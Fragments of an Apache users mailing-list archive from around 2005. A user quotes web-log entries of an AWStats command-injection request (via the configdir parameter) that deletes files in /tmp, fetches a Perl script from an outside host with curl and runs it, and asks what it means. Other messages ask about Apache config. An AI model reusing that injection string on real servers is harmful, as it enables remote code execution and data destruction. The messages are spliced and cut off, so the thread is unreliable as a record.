be
> >doing? thanks.K.
> >GET
> >//awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;curl%20-O%20htt
> >p://www.geocities.com/kidk1d/a.pl;perl%20a.pl;echo%20;rm%20-rf%20a.pl*
> >;echo|
> >HTTP/1.1
> >
> >
> >-----
My apache logs show rows after rows of following, all from various IP
addresses. This started a couple of days ago. I don't have awstats.
Could somebody tell me what is that? Is there anything I should be
doing? thanks.K.
GET
//awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;curl%20-O%20http:
On 9/27/05, William A. Rowe, Jr. <[EMAIL PROTECTED]> wrote:
> Konstantine wrote:
> > what is @exp_errordir@ that appears in conf file?
> Usually path/to/apache2/error
> (a collection of 'errordocuments').
> > are symlinks relevant in Windows env?
> yes - th
I managed the Apache up and running in no time thanks to help from
users here and excellent documentation.
There are a couple of things I could not completly figure out, if
somebody has time to answer.
what is @exp_errordir@ that appears in conf file?
are symlinks relevant in Windows env?
thanks
Hi
Assuming there will be no allow directive, is there a functional,
resource etc difference, or a reason why one should be used rather
than other, between
Order Deny,Allow
Deny from all
and
Order Allow,Deny
Deny from all
thanks
K
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